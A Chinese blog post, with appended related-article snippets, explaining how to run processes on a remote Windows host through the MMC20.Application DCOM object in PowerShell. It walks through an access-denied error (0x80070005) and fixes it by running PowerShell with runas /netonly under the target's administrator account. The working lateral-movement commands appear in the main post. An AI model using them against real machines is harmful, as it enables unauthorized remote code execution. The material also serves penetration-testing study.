MMC20.Application远程创建DCOM对象,拒绝访问0x80070005

最新推荐文章于 2024-08-03 23:12:25 发布
原创 最新推荐文章于 2024-08-03 23:12:25 发布 · 2.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何通过PowerShell利用MMC20.DCOM对象在远程机器上启动进程,以及遇到的0x8007005权限错误。解决方法是使用runas命令以目标机器的管理员凭证运行PowerShell,从而成功激活远程DCOM对象并执行命令。此技术涉及到远程操作和系统权限控制。

关于利用MMC20这个DCOM对象启动进程的方法,网上已经有不少文章了。

我在测试在远程目标机器上创建MMC20对象时,始终提示0x8007005错误

PS测试代码:

$com = [Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.198.133"));
$com = Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\Calc.exe","0","0","0")

在攻击者机器上打开powershell输入上面命令,提示没权限激活远程dcom对象

使用“1”个参数调用“CreateInstance”时发生异常:“从计算机 192.168.198.133 中在 COM 类工厂内检索 CLSID 为 {49B2791A-B1AE-4C90-9B8E-E860BA07F889} 的远程组件失败,原因是出现以下错误:
 80070005 192.168.198.133。”
所在位置 行:1 字符: 1
+ $com = [Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.A ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : UnauthorizedAccessException

虽然知道出错原因,需要在执行命令时,带入目标机器的管理员用户凭证;

最终通过runas命令解决了这个问题,具体步骤如下:

首先在攻击者机器上,打开cmd,输入以下命令:

runas /netonly /user:victim\administrator powershell

参数解释:

  • victim为目标机器的电脑名称
  • administrator为目标机器的管理员用户

然后根据提示输入目标机器administrator管理员用户的密码;

随后会在攻击者机器上弹出一个powershell窗口,这个powershell控制台默认是带了凭证的,在这个窗口执行前面的ps代码,就可以在目标机器上创建任意进程了;

参考资料:

  • https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py
  • http://talvinen.hatenablog.com/entry/2017/01/10/204132
  • https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P3-Exploitation.html
  • https://www.anquanke.com/post/id/215960
  • https://www.blackhat.com/eu-18/briefings/schedule/#network-defender-archeology-an-nsm-case-study-in-lateral-movement-with-dcom-12534
[横向移动] DCOM 远程命令执行横向移动
Blue17 の 小窝
03-21 1175
DcomExec 是 Impacket 工具包中的一个工具,属于是对前面介绍的各种 DCOM 横向移动命令的一个封装,运行工具,提供必要的参数后,它会依次遍历可能可用的 DCOM 接口,然后实现横向移动。虽然前面列举了一堆的 DCOM,但实际上能建立连接进行横向移动的是少之又少,本章笔者就介绍几个常用的,以及其对应的执行远程命令的方法。使用 DCOM 进行横向移动的优势之一,就是在远程主机上执行的进程将会是托管 COM 服务器的软件。(最好还是 Administrator 级别的,一般管理员可能还不太够)
Excel上传服务器后拒绝访问异常,Retrieving the COM class factory for component with CLSID ...
AngelSmile
01-13 3095
环境及异常信息说明 环境说明: Win2008 R2(中文版) x64 、IIS 7.0 功能说明:上传Excel到服务器,并在服务器端读取Excel中的数据; 异常信息:Retrieving the COM class factory for component with CLSID {00024500-0000-0000-C000-000000000046} failed
内网安全:多种横向移动方式
8888的博客
08-03 1498
DCOMDCOM(分布式组件对象模型)是微软的一系列概念和程序接口。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求,使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件获取DCOM列表:实验前提:1.关闭防火墙2.必须有管理员权限。
【网络安全】企业内网中的横向移动
HBohan的博客
08-25 1800
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的网络安全环境。因而,深入了解攻击思路,“对症下药”,是目前网络安全行业发展的重要方向。 本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击
内网环境横向移动——利用DCOM(1)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-23 1413
这里先提两个概念,COM和DCOMCOM即组件对象模型(Component Object Model,COM) ,是基于 Windows 平台的一套,由一组和组成。COM是许多微软产品和技术,如Windows媒体播放器和Windows Server的基础。一般的对象是由数据成员和作用在其上的方法组成,而组件对象和一般对象虽有相似性,但又有较大不同。组件对象不使用方法而用接口来描述自身。
0x80070005拒绝访问
qq_38801934的博客
05-01 6679
指定错误 bai0x80070005拒绝访问 主要原因以下几种 1、登入duWindows时使用zhi空白密码的,应将组策略:“帐dao户:使用空白密码的本地帐户只允许进行控制台登录”改为“停用”就可以了。具体操作是打开开始运行->输入gpedit.msc打开组策略->计算机配置->windows设置->安全设置->本地策略->安全选项看右边框内:“帐户:使用空白密码的本地帐户只允许进行控制台登录”改为“停用”,就可以了。 2、可能权限不够或被禁止,具体操作是打开开始运
服务器应用程序不可用,错误:0x80070005拒绝访问
wqsys的专栏
05-02 2983
服务器应用程序不可用 您试图在此 Web 服务器上访问的 Web 应用程序当前不可用。请点击 Web 浏览器中的“刷新”按钮重试您的请求。 管理员注意事项: 详述此特定请求失败原因的错误消息可在 Web 服务器的系统事件日志中找到。请检查此日志项以查明导致该错误发生的原因。   Windows 日志错误提示 由于无法创建应用程序域,因此未能执行请求。错误: 0x80070005
Retrieving the COM class factory for component with CLSID {00024500-0000-0000-C000-000000000046} failed due to the following error: 80070005 Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)).
最新发布
06-25
}```3.**权限最小化**:-仅授予必要的DCOM权限(避免完全控制)###故障排除流程```mermaidgraphTDA[出现0x80070005错误]-->B{是否服务器环境?}B-->|是|C[确认执行账户]B-->|否|D[检查本地账户权限]C-->E[配置DCOM...
Access is denied, please check whether the [domain-username-password] are correct. Also, if not already done please check the GETTING STARTED and FAQ sections in readme.htm. They provide information on how to correctly configure the Windows machine for DCOM access, so as to avoid such exceptions. [0x00000005]
04-24
好的,我现在需要帮助用户解决DCOM访问权限被拒绝的问题,错误代码是0x00000005。用户已经检查了域用户名密码是否正确,并参考了readme.htm中的GETTING STARTED和FAQ部分进行配置,但问题仍然存在。我需要结合提供的...
OPC DA 服务端搭建 (附Java 客户端代码)
nickDaDa的博客
07-28 2万+
1、如果不清楚用户组针对哪些服务权限,就不操作用户组。给所需要的服务权限控制上直接加用户就可以了。2、经测试,客户端的用户名和服务端的一样都是admin,但是密码不同,依然可以调用opc服务端。3、连接失败的原因,基本都由于服务端的配置(包括授权配置、网络配置),或者程序中参数写错(或找错)导致。httpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttps。............
IE出现“XMLHttpRequest: 网络错误 0x80070005, 拒绝访问”的解决方案
weixin_34403976的博客
07-27 6487
最近使用Vue开发的项目,本地开发, 使用IE浏览器访问出现了问题 提示: “Access-Control-Allow-Headers 列表中不存在请求标头 content-type”, “XMLHttpRequest: 网络错误 0x80070005, 拒绝访问”。 解决方案 1.在IE浏览器中打开 Internet选项 2.切换到 安全 选项卡,点击 Internet,取消勾选 启用保护模式,然后点击 自定义级别 3.在弹出的窗口中,启用 跨域浏览窗口和框架、通过域访问数据,然后点击确认 .
网络错误0x80070005,访问被拒绝[亲测解决]
热门推荐
Museions的开心博客
06-29 5万+
IE浏览器报错:网络错误0x80070005,访问被拒绝,IE浏览器的安全机制给拦截过滤掉了,解决方式如下: 浏览器右上角 工具>Internet选项     保存后继续访问,如果还是出现以上提示,需要再执行一下操作,看看是否已经生效配置!或者重启电脑之后再访问.   这样配置后电脑会有很大的安全风险: 启用和进行此更改不仅适用于您的网站,也适用于其他网站。默认...
“Error opening Windows firewall: 0x80070005 拒绝访问” 的解决办法
一苇以航
01-24 3万+
由种子下载资料的时候遇到了“Error opening Windows firewall: 0x80070005 拒绝访问” 这么个错误。查了下资料找到如下的解决方法: 1、开启win防火墙,在防火墙中设置例外,重启utorrent。 2、发现网上找的如上的方法还是不行,然后把 UT设置-连接 自动添加防火墙例外前面的对钩去掉。 这样在重启utorrent就不报错了。...
ssms安装失败_拒绝访问0x80070005解决方法
m0_38048955的博客
01-04 1946
解决方案
mmc20创建进程c/c++实现
被遗弃的庸才博客
09-19 670
,在查找有意思的包含exe方法的时候发现了mmc20,且接口是6efc2da2-b38c-457e-9abb-ed2d189b8c38。但常见的使用mmc20都是用的vbs和powershell来创建的进程,这里提供c/c++的实现。最近写了一份遍历clsid所有接口的代码(
关于COM类工厂80070005和8000401a错误分析及解决办法(DCOM)
wyzlwyzl的专栏
11-26 8271
关于COM类工厂80070005和8000401a错误分析及解决办法   问题描述:最近做一个web应用程序需要操作Excel文件,在开发环境下程序测试正常,部署到IIS后程序操作Excel文件,IIS报错,错误出现在创建Excel进程的语句,如下: Application myExcelApp = new ApplicationClass();  IIS提示信息如下: 检索 COM 类
针对每种Windows Server 操作Excel、Word等Office组件遇到“ComException"、”80070005“等COM错误的解决方案大汇总...
weixin_34185512的博客
04-13 421
以下所有Excel错误的解决方案,同样适用于Word、PowerPoint等Office产品。 以下解决方案中,如果出现"安装Excel组件",是适用于遇到Excel错误的。如果是Word错误,则安装Word组件,而不是Excel组件,PowerPoint亦是如此,依次类推。 当然,如果你足够任性,你可以选择安装整个Office套件,不会有人说你什么的。   错误: 1.检索 COM 类...
导出word 服务器报错修正
期盼的骆驼专栏
03-10 2879
导出word 出现以下错误: 检索 COM 类工厂中 CLSID 为 {000209FF-0000-0000-C000-000000000046} 的组件失败,原因是出现以下错误: 8000401a 因为配置标识不正确,系统无法开始服务器进程。请检查用户名和密码。 (异常来自 HRESULT:0x8000401A)。 这个问题是权限问题。 1.开始-dcomcnfg,启动组件服务
[轉]Excel不能使用 80070005错误 Excel的DCOM权限问题
weixin_30457881的博客
06-07 150
轉自http://hi.baidu.com/zfy0921/blog/item/dd0e1bc5ca6890c138db497a.html 检索 COM 类工厂中 CLSID 为{00024500-0000-0000-C000-000000000046} 的组件时失败,原因是出现以下错误: 80070005。 具体解决方法如下: 1:在服务器上安装office的Excel...
dcom 0x80070005
01-25
### 解决 DCOM 权限错误 0x80070005 的方法 对于遇到的 DCOM 错误 `0x80070005`,这通常表示访问被拒绝。此问题可能源于应用程序试图通过分布式组件对象模型(DCOM)调用远程过程却未能获得必要的权限。 #### 修改注册表设置 为了允许特定的应用程序或进程拥有足够的权限来执行所需的DCOM操作,可以调整Windows系统的本地安全策略或是直接修改注册表中的相应键值[^1]。 ```powershell Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\OLE' -Name 'EnableDCOM' -Value 'Y' Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\OLE' -Name 'LegacyAuthenticationLevel' -Value 2 ``` #### 配置 DCOM CNFG 设置 进入 **控制面板 -> 管理工具 -> 组件服务** ,找到并右击想要更改属性的服务,在弹出菜单中选择“属性”,切换到安全性标签页下做如下设定: - 启动交互选项:自定义,并指定启动身份验证级别以及运行该应用的身份; - 访问权限:点击编辑按钮增加需要授权的对象及其权限等级; - 调用者身份验证级别设为包级(Package Level)[^2]; #### 创建桌面文件夹并赋予适当权限 创建目录 `"C:\Windows\SysWOW64\config\systemprofile\Desktop"` 或者针对32位操作系统则是 `"C:\Windows\System32\config\systemprofile\Desktop"` 。接着给这个新建立好的Desktop文件夹分配完全控制权给相应的用户账户比如"IIS AppPool\DefaultAppPool"。 #### 安全性和兼容性考量 考虑到某些情况下可能是由于防病毒软件干扰所致,则建议暂时禁用防火墙和杀毒程序测试是否依旧存在问题。另外,更新至最新版的操作系统补丁也可能有助于解决问题[^3]。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值